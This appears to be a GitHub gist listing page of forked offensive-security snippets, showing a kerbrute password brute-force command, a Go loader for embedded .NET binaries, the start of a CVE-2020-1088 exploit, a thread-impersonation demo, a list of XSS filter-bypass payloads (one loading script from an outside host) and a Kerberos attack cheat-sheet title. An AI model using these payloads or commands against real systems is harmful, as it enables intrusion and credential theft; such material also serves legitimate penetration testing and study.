With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
xct
/ go-sharp-loader.go
Created
August 6, 2020 10:07
— forked from ropnop/go-sharp-loader.go
Example Go file embedding multiple .NET executables
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| /* | |
| Example Go program with multiple .NET Binaries embedded | |
| This requires packr (https://github.com/gobuffalo/packr) and the utility. Install with: | |
| $ go get -u github.com/gobuffalo/packr/packr | |
| Place all your EXEs are in a "binaries" folder |
xct
/ WerArbitraryFileDelete.cs
Created
May 17, 2020 18:58
— forked from fisboger/WerArbitraryFileDelete.cs
CVE-2020-1088
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using NtApiDotNet; | |
| using System; | |
| using System.Collections.Generic; | |
| using System.Diagnostics; | |
| using System.IO; | |
| using System.Linq; | |
| using System.Text; | |
| using System.Threading; | |
| using System.Threading.Tasks; |
xct
/ impersonate.go
Created
April 22, 2020 17:03
— forked from kostix/impersonate.go
A demonstration example for http://stackoverflow.com/a/26124494
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // A demonstration example for http://stackoverflow.com/a/26124494 | |
| // It runs a goroutine locked to an OS thread on Windows | |
| // then impersonates that thread as another user using its name | |
| // and plaintext password, then reverts to the default security | |
| // context before detaching from its OS thread. | |
| package main | |
| import ( | |
| "log" | |
| "runtime" |
xct
/ xxsfilterbypass.lst
Created
August 20, 2019 16:34
— forked from rvrsh3ll/xxsfilterbypass.lst
XSS Filter Bypass List
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |
| '';!--"<XSS>=&{()} | |
| 0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-" | |
| <script/src=data:,alert()> | |
| <marquee/onstart=alert()> | |
| <video/poster/onerror=alert()> | |
| <isindex/autofocus/onfocus=alert()> | |
| <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> | |
| <IMG SRC="javascript:alert('XSS');"> | |
| <IMG SRC=javascript:alert('XSS')> |
xct
/ kerberos_attacks_cheatsheet.md
Created
June 23, 2019 11:57
— forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks